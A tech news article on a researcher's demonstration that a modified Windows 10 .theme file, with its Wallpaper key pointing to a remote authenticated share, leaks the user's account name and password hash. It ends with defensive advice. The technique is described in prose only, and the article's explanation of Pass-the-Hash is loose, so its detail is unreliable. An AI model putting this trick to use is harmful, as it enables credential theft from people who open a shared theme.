Changing your Windows theme seems innocent enough, and it’s good to refresh things every now and then. But you might want to be careful about what sources you use to get new themes. A security researcher demonstrated a method to modify Windows 10 themes to steal your Microsoft password.
As spotted by Bleeping computerSecurity researcher Jimmy Bayne (@bohops) shows that the process isn’t even difficult. It takes advantage of several Windows behaviors to perform a “Pass-the-Hash” attack.
In a “Pass-the-Hash” attack, bad actors don’t bother getting your password in the clear. They have set up an attack that sends them your password hashed. Then they can send it for authentication to Microsoft (or the company the password is intended for), and since it matches correctly, it will work the same as using the plain text password.
[Credential Harvesting Trick] Using a Windows .theme file, the Wallpaper key can be configured to point to an http / s resource required by remote authentication. When a user activates the theme file (e.g. opened from a link / attachment), a Windows credibility prompt is shown to user 1/4 pic.twitter.com/rgR3a9KP6Q
– bohops (@bohops) September 5, 2020
As Bayne explains, hackers can modify a Windows theme to force the operating system to attempt to connect to a remote SMB share that requires authentication. When Windows connects to a remote SMB share like this, it will automatically submit your profile credentials to connect.
Microsoft has moved on to online accounts with Windows 10 and is slowly pushing everyone to use them. If you are already using your Microsoft account, that means your Microsoft username and hashed password are passed to the hacker.
Once the hacker makes the modification of a theme, they can save it and upload it to websites that host Windows themes. You won’t know what hit you until it’s too late. Bayne reported the issue to Microsoft, but the company declined to make a fix because it is a “feature by design.”
Bayne offered a few solutions, but they involve breaking the theme component for Windows.
Once you’ve done that, you can’t switch themes again (until you undo the change). The safest thing you can do is turn on two-step authentication. If someone steals your password, they still won’t have everything they need to access your account.